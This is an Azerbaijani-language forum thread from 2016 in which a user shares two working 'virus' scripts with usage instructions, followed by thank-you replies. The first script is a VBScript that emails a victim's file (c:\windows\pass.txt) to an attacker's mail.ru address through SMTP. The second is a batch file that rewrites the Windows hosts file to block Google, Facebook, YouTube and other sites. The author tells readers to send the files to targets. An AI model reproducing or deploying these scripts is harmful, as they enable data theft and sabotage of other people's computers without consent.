0
0
Xoş gəldin, Qonaq
Master Forum | Arxiv Mövzular | Arxiv 1
  2 Virus kodlar paylasiram
KAROL-YEK KAROL-YEK [Off] [#] (15.03.2016 / 00:36)
Salam Azmaster ehli bu gun sizlere iki vurus kodlar paylasacam buyurun
bu mövzuda sizə 2 kiçik ancaq cox maraqlı virus təqdim edəcəm

1) VBS sender

bu script visual basic script-də yazılmışdır

məqsədi kiminsə kompunda hansısa bir faylı oğurlamaq dır

Kod:
on error resume next
Set S = CreateObject("Wscript.Shell")
set FSO=createobject("scripting.filesystemobject")
Call SendPost("smtp.mail.ru","qebuleden@mail.ru","gonderen@mail.ru","Salamlar","")
Function SendPost(strSMTP_Server,strTo,strFrom,strSubject,strBody)
Set iMsg=CreateObject("CDO.Message")
Set iConf=CreateObject("CDO.Configuration")
Set Flds=iConf.Fields
Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendusing")=2
Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpauthenticate")=1
Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendusername")="goderen"
Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendpassword")="sifre"
Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpserver")="smtp.mail.ru"
Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpserverport")=25
Flds.Update
iMsg.Configuration=iConf
iMsg.To=strTo
iMsg.From=strFrom
iMsg.Subject=strSubject
iMsg.TextBody=strBody
iMsg.AddAttachment "c:\windows\pass.txt"
iMsg.Send
End Function
Set iMsg=Nothing
Set iConf=Nothing
Set Flds=Nothing


mən onu mail.ru ilə işləməsi üçün nastroyka eləmişəm
deməli bizə 2 mail lazım olacaq , birincisi faylı göndərmək üçün ikincisi qəbul etmək üçün
faylı gonderen@mail.ru göndərəcək,
qebuleden@mail.ru isə qəbul edəcək
indi gərək bu kodda parol və logini dəyişəkki mail getsin
Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendusername")="goderen" burada gonderen login
Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendpassword")="sifre" burada mailin passwordu sifre -dir

hansı faylı oğurlamaq lazım olduğunu isə bura yazırıq iMsg.AddAttachment "c:\windows\pass.txt" göründüyü kimi script windows -dakı pass.txt faylını gönderecek. Lazımlı nastroyka edəndən sonra bu kodu .vbs uzantısı (расширение) ilə soxranit edirik və lazım olan adama gönrəririk


2ci- movzu
2) Sayt açmağa qadağa qoyan virus

Kod:
@echo off
echo -- >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 vk.com >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.vk.com >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 mail.ru >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.mail.ru >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 facebook.com >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.facebook.com >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 odnoklassniki.ru >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.odnoklassniki.ru >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 google.com >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.google.com >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 google.ru >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.google.ru >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 google.am >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.google.am >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 bing.com >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.bing.com >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 rambler.ru >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.rambler.ru >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 yandex.ru >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.yandex.ru >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 youtube.com >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.youtube.com >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 icq.com >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.icq.com >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 microsoft.com >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.microsoft.com >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 hotmail.com >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.hotmail.com >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 yahoo.com >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.yahoo.com >> %windir%\system32\drivers\etc\hosts


bu virus hosts fayl olan \system32\drivers\etc\ -da yerləşən hosts fayla dəyişikliklər edir
yəni əgər kimsə bu virusu öz kompunda açsa onda kodda yazılmış saytlar onda açılmayacaq. səbəbi odurki o tutalım google.com açanda avtomatik olaraqa browser onu 127.0.0.1 -ə yönəldəcək bu isə local İP olduğunda sayt açılmayacaq.
bu kodu copy edib text faylına paste edib .bat uzantısı ilə soxranit edib lazım olan adama soxuşdururuq .ha.
by-edik* by-edik* [Off] [#] (15.03.2016 / 00:44)
# KAROL-YEK (15.03.2016 / 04:36)
Salam Azmaster ehli bu gun sizlere iki vurus kodlar paylasacam buyurun
bu mövzuda sizə 2 kiçik ancaq cox maraqlı virus təqdim edəcəm

1) VBS sender

bu script visual basic script-də yazılmışd
salam nese komey lazim iydi
KAROL-YEK KAROL-YEK [Off] [#] (15.03.2016 / 01:03)
by-edik*, Alekum salam xyir komek lazim deyil men komek ucun acmamisam ki virus paylasmisam movzumde
KAROL-YEK KAROL-YEK [Off] [#] (15.03.2016 / 09:47)
LocalHost, bu formatda qaqas VBS
G451M0V G451M0V [Off] [#] (15.03.2016 / 13:03)
Cooox Sagol qaqaw lazim olacaq mene
Birincini ne adla yaddasda saxlayaq.?
4L0N3_S 4L0N3_S [Off] [#] (15.03.2016 / 17:26)
twkler
KAROL-YEK KAROL-YEK [Off] [#] (15.03.2016 / 17:41)
G451M0V, #1 de var bu farmatda VBS yaddasa verin
Aazz Aazz [Off] [#] (25.03.2016 / 10:18)
Cox sagol.bu paylasdiqlarindan kitab yigmaq olar ))
KAROL-YEK KAROL-YEK [Off] [#] (25.03.2016 / 11:26)
Aazz, heri eledir
  2 Virus kodlar paylasiram
Cəmi: 9 Cavab
Mövzunu vip et
Mövzuya Baxanlar (6 nəfər)
Müellife göre filtreleme
Mövzunu Yükle

2 Virus kodlar paylasiram

2 Virus kodlar paylasiram

Rol.Az